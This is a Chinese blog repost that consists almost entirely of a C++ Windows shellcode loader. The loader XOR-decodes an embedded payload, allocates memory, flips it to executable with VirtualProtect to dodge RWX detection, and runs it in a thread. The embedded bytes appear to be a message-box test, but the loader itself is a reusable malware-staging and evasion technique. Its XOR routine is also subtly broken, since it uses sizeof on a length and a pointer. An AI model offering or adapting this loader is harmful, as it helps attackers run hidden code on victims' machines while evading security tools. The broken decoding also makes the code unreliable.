shellLoad

#include <windows.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include<iostream>

#include<cctype>

using namespace std;



//XOR异或

void xorData(unsigned char* data, size_t length, unsigned char* key) {

int j = 0;

for (int i = 0; i < sizeof length; i++) {

if (j == sizeof key - 1) j = 0;

data[i] = data[i] ^ key[j];

j++;

}

}



int main(void) {



void* exec_mem;

BOOL rv;

HANDLE th;

DWORD oldprotect = 0;



//shellcode在main函数内，存储在pe结构的sections table中的.text部分

unsigned char payload[] = "\x88\x21\xe5\x81\x83\x9a\x9c\x8b\xe8\xd0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x3e\x48\x8d\x8d\x25\x01\x00\x00\x41\xba\x4c\x77\x26\x07\xff\xd5\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x0e\x01\x00\x00\x3e\x4c\x8d\x85\x1a\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff\xd5\x68\x65\x6c\x6c\x6f\x77\x6f\x72\x6c\x64\x21\x00\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x00";



unsigned int payload_len = sizeof(payload);

//KEY

unsigned char key[] = "tidesec";



xorData(payload, payload_len, key);



// 使用VirtualAlloc申请一个可读可写的内存，这里没有申请执行权限是为了防止出现RWX权限的敏感内存

exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);



// 将shellcode复制到申请的内存中，这里还可以用memcpy等

RtlMoveMemory(exec_mem, payload, payload_len);



// 使用VirtualProtect添加执行权限

rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);



// 如果返回正常，创建线程执行shellcode

if (rv != 0) {

th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);

WaitForSingleObject(th, -1);

}



return 0;

}

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/915822.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

shellLoad

相关文章

Qt_day4_Qt_UI设计

Axure网络短剧APP端原型图，竖屏微剧视频模版40页

网安加·百家讲坛 | 仝辉：金融机构鸿蒙应用安全合规建设方案

C语言 strlen 函数 - C语言零基础入门教程

OceanStor Pacific系列 8.1.0 功能架构

Simulink中Matlab function使用全局变量

react-markdown内容宽度溢出和换行不生效问题

【C#设计模式(10)——装饰器模式(Decorator Pattern)】

Diffusion Transformer模型结构解析（DiT、SD3、Flux）

给阿里云OSS绑定域名并启用SSL

如何找到系统中bert-base-uncased默认安装位置

【算法】区间DP

机器学习—决定下一步做什么

第二十周机器学习笔记：初步认识PINN

数据结构的时间复杂度和空间复杂度

SQL面试题——奔驰SQL面试题车辆在不同驾驶模式下的时间

Mac 使用mac 原生工具将mp4视频文件提取其中的 mp3 音频文件

多模态与大模型技术赋能企业数据资产平台建设

【CentOS】中的Firewalld：全面介绍与实战应用（上）

使用 unicorn 和 capstone 库来模拟 ARM Thumb 指令的执行（一）